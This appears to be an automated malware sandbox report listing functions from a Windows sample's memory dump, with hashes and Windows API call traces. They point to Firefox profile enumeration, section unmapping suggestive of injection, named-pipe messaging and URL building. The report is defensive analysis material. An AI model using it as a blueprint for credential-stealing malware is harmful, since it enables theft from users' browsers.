  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5C23, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59 Total matches: 27stringtime
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6C08, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141 Total matches: 19registrysynchronization
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3F95, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80 Total matches: 37memorystring
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
